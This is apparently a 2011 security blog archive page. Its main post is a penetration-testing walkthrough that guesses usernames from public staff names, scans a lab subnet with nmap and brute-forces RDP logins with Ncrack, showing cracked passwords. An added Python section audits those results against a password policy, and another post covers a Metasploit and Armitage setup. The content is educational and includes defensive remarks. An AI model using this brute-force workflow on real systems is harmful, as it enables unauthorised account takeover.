Archive > May 2011

My lunch box 9

» 26 May 2011 » In Uncategorized » No Comments

Chicken saltimbocca with prosciutto and a leaf of sage - http://en.wikipedia.org/wiki/Saltimbocca
Hummus - http://humus101.com/EN/category/hummus/
Green salad

Smooth-Sec at dorscluc 2011

» 22 May 2011 » In Uncategorized » No Comments

I attended the Croatian Linux Users conference last week, where I gave a lightning talk about Smooth-Sec. Although it was a short talk, I had the chance to describe the main features of the distribution. I underlined how easy it is to install and deploy Smooth-Sec, describing also the clear and intuitive data visualization provided by Snorby and the power of the Suricata IDS/IPS. I also talked about other possible Smooth-Sec uses: as a malware analysis tool, for system and network forensics, and as a learning platform (pen test labs or infosec classes). The conference was filled with lots of interesting lectures; one special guest was Mark Shuttleworth, who gave a keynote on various topics, from his experience in space to the importance of the free software communities, the future of Ubuntu and how to develop sustainable business models with open source and free software. Dorscluc is a great, well-organized event that gets better every year; see you there in 2012.

Below you can find my slides.

Smooth-Sec – Ready to Go Linux Solution for Information Security

Remote desktop credentials audit with Ncrack

» 12 May 2011 » In Uncategorized » 10 Comments

DISCLAIMER
All information provided is for educational purposes only. It is not an endorsement to undertake hacking activity in any form (unless such activity is authorized). The tools and techniques demonstrated may be potentially damaging if used inappropriately. All characters and data written in this post are fictitious.

The Remote Desktop Protocol is often underestimated as a possible way to break into a system during a penetration test. Other services, such as SSH and VNC, are more likely to be targeted and exploited with a remote brute-force password guessing attack. For example, let’s suppose that we are in the middle of a penetration testing engagement at the “MEGACORP” offices and we have already tried all the available remote attacks with no luck. We also tried ARP poisoning on the LAN, hoping to capture usernames and passwords, without succeeding. From a previous nmap scan log we found a few Windows machines with the RDP port open and decided to investigate this possibility further. First of all we need some valid usernames, so that we only have to guess the passwords rather than both. We found the names of the IT staff on various social networking websites. These are the key IT people:

jessie tagle
julio feagins
hugh duchene
darmella martis
lakisha mcquain
ted restrepo
kelly missildine

It didn’t take long to build likely usernames following the common convention of the first letter of the first name followed by the entire surname.

jtagle
jfeagins
hduchene
dmartis
lmcquain
trestrepo
kmissildine

Software required:

A Linux machine, preferably Ubuntu.
nmap, a terminal server client and the build dependencies for Ncrack: sudo apt-get install tsclient nmap build-essential checkinstall libssl-dev libssh-dev

About Ncrack

Ncrack is a high-speed network authentication cracking tool. It was built to help companies secure their networks by proactively testing all their hosts and networking devices for poor passwords. Security professionals also rely on Ncrack when auditing their clients. Ncrack’s features include a very flexible interface granting the user full control of network operations, allowing for very sophisticated brute-forcing attacks, timing templates for ease of use, runtime interaction similar to Nmap’s, and many more. Supported protocols include RDP, SSH, HTTP(S), SMB, POP3(S), VNC, FTP and telnet. Source: http://nmap.org/ncrack/

Installation

wget http://nmap.org/ncrack/dist/ncrack-0.4ALPHA.tar.gz
mkdir /usr/local/share/ncrack
tar -xzf ncrack-0.4ALPHA.tar.gz
cd ncrack-0.4ALPHA
./configure
make
checkinstall
dpkg -i ncrack_0.4ALPHA-1_i386.deb

Information gathering

Let’s find out which hosts in the network are up and save them to a text list. The regular expression extracts only the IP addresses from the scan output.

Nmap ping scan (-sP): go no further than determining whether each host is online.

nmap -sP 192.168.56.0/24 | grep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}' > 192.168.56.0.txt

Nmap fast scan (-F) with input from the list of hosts/networks (-iL):

nmap -F -iL 192.168.56.0.txt


Starting Nmap 5.21 ( http://nmap.org ) at 2011-04-10 13:15 CEST

Nmap scan report for 192.168.56.10
Host is up (0.0017s latency).
Not shown: 91 closed ports
PORT     STATE SERVICE
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
1028/tcp open  unknown
3389/tcp open  ms-term-serv
MAC Address: 08:00:27:09:F5:22 (Cadmus Computer Systems)

Nmap scan report for 192.168.56.101
Host is up (0.014s latency).
Not shown: 96 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3389/tcp open  ms-term-serv
MAC Address: 08:00:27:C1:5D:4E (Cadmus Computer Systems)

Nmap done: 55 IP addresses (55 hosts up) scanned in 98.41 seconds

From the log we can see two machines with the Microsoft Terminal Services port (3389) open. Looking more closely at the services available on 192.168.56.10 (Kerberos, LDAP and SMB are open as well), we can assume that this machine might be the domain controller, and it’s worth trying to pwn it.

At this point we need to create a file (my.usr) with the probable usernames previously gathered.

vim my.usr

jtagle
jfeagins
hduchene
trestrepo
kmissildine

We also need a file (my.pwd) with the candidate passwords; you can look on the internet for common passwords and wordlists.

vim my.pwd

somepassword
passw0rd
blahblah
12345678
iloveyou
trustno1

At this point we run Ncrack against the 192.168.56.10 machine.


ncrack -vv -U my.usr -P my.pwd 192.168.56.10:3389,CL=1

Starting Ncrack 0.4ALPHA ( http://ncrack.org ) at 2011-05-10 17:24 CEST

Discovered credentials on rdp://192.168.56.10:3389 'hduchene' 'passw0rd'
rdp://192.168.56.10:3389 Account credentials are valid, however,the account is denied interactive logon.
Discovered credentials on rdp://192.168.56.10:3389 'jfeagins' 'blahblah'
rdp://192.168.56.10:3389 Account credentials are valid, however,the account is denied interactive logon.
Discovered credentials on rdp://192.168.56.10:3389 'jtagle' '12345678'
rdp://192.168.56.10:3389 Account credentials are valid, however,the account is denied interactive logon.
Discovered credentials on rdp://192.168.56.10:3389 'kmissildine' 'iloveyou'
rdp://192.168.56.10:3389 Account credentials are valid, however,the account is denied interactive logon.
Discovered credentials on rdp://192.168.56.10:3389 'trestrepo' 'trustno1'

rdp://192.168.56.10:3389 finished.

Discovered credentials for rdp on 192.168.56.10 3389/tcp:
192.168.56.10 3389/tcp rdp: 'hduchene' 'passw0rd'
192.168.56.10 3389/tcp rdp: 'jfeagins' 'blahblah'
192.168.56.10 3389/tcp rdp: 'jtagle' '12345678'
192.168.56.10 3389/tcp rdp: 'kmissildine' 'iloveyou'
192.168.56.10 3389/tcp rdp: 'trestrepo' 'trustno1'

Ncrack done: 1 service scanned in 98.00 seconds.
Probes sent: 51 | timed-out: 0 | prematurely-closed: 0

Ncrack finished.

We can see from the Ncrack results that all the usernames gathered are valid, and we were also able to crack the login credentials, since the accounts were using weak passwords. Four of the IT staff have some kind of restriction on this machine; the exception is hduchene, who might be the domain administrator. Let’s find out.

Run the terminal server client from the Linux box:

tsclient 192.168.56.10, using Hugh Duchene’s credentials ‘hduchene’ ‘passw0rd’, and BINGO !!!

At this point we have control of the entire MEGACORP domain, with unlimited access to all the corporate resources that belong to it. We can add users, escalate the privileges of existing users, browse the protected network resources, install backdoors and rootkits, and much more.

Final remarks.

For the penetration testers: don’t give up at first hurdle, there’s always another way to break in :-) .

For the IT staff: the lack of a password policy enforcing complexity and strength leads to a disaster.
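To turn the Ncrack transcript into audit findings that can be handed to the IT staff, the next Python script (an added example, not code from the post or from Ncrack) parses the “Discovered credentials” lines, records which accounts were additionally reported as denied interactive logon, and checks each recovered password against an assumed baseline policy (minimum 12 characters, three of four character classes, not in a common-password list). Two assumptions: the pairing rule, that a denial notice applies to the credential discovered immediately after it, is inferred from the author’s reading of the transcript (hduchene unrestricted, the other four restricted), not from Ncrack’s documentation; and the policy thresholds and the tiny common-password list are constructed for the example, not MEGACORP’s policy.

```python
import re

# Constructed sample: the Ncrack transcript from the post, verbatim.
SAMPLE_NCRACK_OUTPUT = """\
Starting Ncrack 0.4ALPHA ( http://ncrack.org ) at 2011-05-10 17:24 CEST

Discovered credentials on rdp://192.168.56.10:3389 'hduchene' 'passw0rd'
rdp://192.168.56.10:3389 Account credentials are valid, however,the account is denied interactive logon.
Discovered credentials on rdp://192.168.56.10:3389 'jfeagins' 'blahblah'
rdp://192.168.56.10:3389 Account credentials are valid, however,the account is denied interactive logon.
Discovered credentials on rdp://192.168.56.10:3389 'jtagle' '12345678'
rdp://192.168.56.10:3389 Account credentials are valid, however,the account is denied interactive logon.
Discovered credentials on rdp://192.168.56.10:3389 'kmissildine' 'iloveyou'
rdp://192.168.56.10:3389 Account credentials are valid, however,the account is denied interactive logon.
Discovered credentials on rdp://192.168.56.10:3389 'trestrepo' 'trustno1'

rdp://192.168.56.10:3389 finished.
"""

DISCOVERED_RE = re.compile(
    r"^Discovered credentials on (?P<svc>\w+)://(?P<host>[^:]+):(?P<port>\d+) "
    r"'(?P<user>[^']*)' '(?P<pw>[^']*)'"
)
DENIED_RE = re.compile(r"denied interactive logon")

# Constructed, deliberately tiny list standing in for a real wordlist.
COMMON_PASSWORDS = {"password", "passw0rd", "12345678", "iloveyou", "trustno1", "blahblah"}


def parse_ncrack(text):
    """Return one finding per discovered credential.

    Assumption (from the author's reading of the transcript, not Ncrack docs):
    a 'denied interactive logon' notice refers to the credential that Ncrack
    reports as discovered on the next 'Discovered credentials' line.
    """
    findings = []
    pending_denial = False
    for line in text.splitlines():
        if DENIED_RE.search(line):
            pending_denial = True
            continue
        m = DISCOVERED_RE.match(line)
        if m:
            findings.append({
                "service": m.group("svc"),
                "host": m.group("host"),
                "port": int(m.group("port")),
                "user": m.group("user"),
                "password": m.group("pw"),
                "interactive_logon": not pending_denial,
            })
            pending_denial = False
    return findings


def password_policy_violations(password, min_length=12):
    """List the rules a password breaks under the assumed baseline policy."""
    problems = []
    if len(password) < min_length:
        problems.append(f"shorter than {min_length} characters")
    classes = sum(bool(re.search(p, password)) for p in (r"[a-z]", r"[A-Z]", r"\d", r"[^A-Za-z0-9]"))
    if classes < 3:
        problems.append("fewer than 3 character classes")
    if password.lower() in COMMON_PASSWORDS:
        problems.append("appears in a common-password list")
    return problems


def audit_report(text):
    """(user, can log on interactively, policy violations) per recovered account."""
    return [(f["user"], f["interactive_logon"], password_policy_violations(f["password"]))
            for f in parse_ncrack(text)]


if __name__ == "__main__":
    for user, interactive, problems in audit_report(SAMPLE_NCRACK_OUTPUT):
        flag = "INTERACTIVE LOGON" if interactive else "logon denied"
        print(f"{user:12s} {flag:18s} {'; '.join(problems)}")
```

Run on the embedded transcript, audit_report lists hduchene as the only account with interactive logon and flags every recovered password under all three rules, which is the concrete form of the final remark to the IT staff: the usernames were guessable from public information, so the passwords were the only barrier, and none of them would have survived even a minimal complexity policy.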

Metasploit 3.7.0 and Armitage with postgresql support

» 04 May 2011 » In Uncategorized » 18 Comments

Metasploit version 3.7.0 is available for download, and this new release comes with a significant number of improvements. One of the most important updates is session management: Metasploit can now handle hundreds of sessions, which comes in handy when running large-scale social engineering engagements. Along with this update, other long-awaited features have been added; the most important are pass-the-hash and stolen-password attacks against Windows 2008 and NTLM authentication support in the Microsoft SQL Server driver. As a bonus, this release ships with 35 new remote exploits. Check it out.

Here you can see how to install Metasploit and Armitage from scratch with PostgreSQL support on Ubuntu 11.04.

Metasploit installation


wget http://updates.metasploit.com/data/releases/framework-3.7.0-linux-mini.run

Install the Metasploit framework:

chmod +x framework-3.7.0-linux-mini.run

./framework-3.7.0-linux-mini.run --help

./framework-3.7.0-linux-mini.run

#run the metasploit update

msfupdate

PostgreSQL and dependencies installation


apt-get install postgresql pgadmin3 libpq-dev sun-java6-plugin ruby rubygems libreadline-dev libssl-dev libpq5 ruby-dev nmap

gem install pg

#Metasploit database and a user creation

su postgres
createuser metasploit -P
Enter password for new role:
Enter it again:
Shall the new role be a superuser? (y/n) n
Shall the new role be allowed to create databases? (y/n) n
Shall the new role be allowed to create more new roles? (y/n) n

createdb --owner=metasploit metasploit

#Run msfconsole and enter the following commands
#msfconsole
msf> db_driver postgresql
msf> db_connect metasploit:metasploit@127.0.0.1:5432/metasploit

The msfrpcd daemon must be started:

msfrpcd -f -U metasploit -P metasploit -t Basic

And now it is time to start Armitage:

/opt/framework-3.7.0/msf3/armitage

Check that the PostgreSQL credentials are correct and press Connect.

User: metasploit
Password: metasploit
DB connect string: metasploit:metasploit@127.0.0.1/metasploit

In a couple of seconds Armitage should appear.

In Armitage, go to Hosts > Nmap Scan > Intense Scan, input a subnet of interest, and happy hunting!

Note: in case you get the error “The address is already in use (0.0.0.0:55553)”, check which process is keeping port 55553 busy. You can do it easily by running lsof -i :55553.

COMMAND    PID USER   FD   TYPE DEVICE SIZE/OFF NODE NAME
.ruby.bin 5538 root    4u  IPv4 154865      0t0  TCP *:55553 (LISTEN)

At this point you need to kill the process by its PID, in this case kill -9 5538, and restart msfrpcd with “msfrpcd -f -U metasploit -P metasploit -t Basic”.

The penetration tester bookshelf

» 01 May 2011 » In Uncategorized » 1 Comment

This is a selection of books that every pen tester or infosec person needs to have on the shelf. Other valuable books are available on the topic, but these are my favorites. A particular mention goes to the guys behind the Social Engineering Framework project and the related book, for their invaluable work on pwning humans. Happy reading and hacking!

BackTrack 4: Assuring Security by Penetration Testing

BackTrack 4: Assuring Security by Penetration Testing is a fully focused, structured book providing guidance on developing practical penetration testing skills by demonstrating the cutting-edge hacker tools and techniques in a coherent step-by-step strategy. It offers all the essential lab preparation and testing procedures to reflect real-world attack scenarios from your business perspective in today’s digital age. www.packtpub.com

Social Engineering: The Art of Human Hacking

Social Engineering: The Art of Human Hacking has been unanimously voted the official book on social engineering. Based on the Web’s first official Framework for Social Engineers, this book delves into aspects of human thinking that have not been discussed in previous social engineering books. Many readers have stated it should be used in college as a textbook on both human vulnerabilities and psychology. With in-depth discussions of body language, hand gestures, the scientific part of NLP and microexpressions, Social Engineering: The Art of Human Hacking has been dubbed a “seminal work” in the infosec community. www.social-engineer.com

Professional Penetration Testing: Creating and Operating a Formal Hacking Lab

Thomas Wilhelm has delivered pen testing training to countless security professionals, and now, through the pages of this book, you can benefit from his years of experience as a professional penetration tester and educator. After reading this book you will be able to create a personal penetration test lab that can deal with real-world vulnerability scenarios.

Penetration testing is the act of testing a network to find security vulnerabilities before they are exploited by phishers, digital piracy groups, and countless other organized or individual malicious hackers. The material presented will be useful to beginners all the way through to advanced practitioners. www.syngress.com
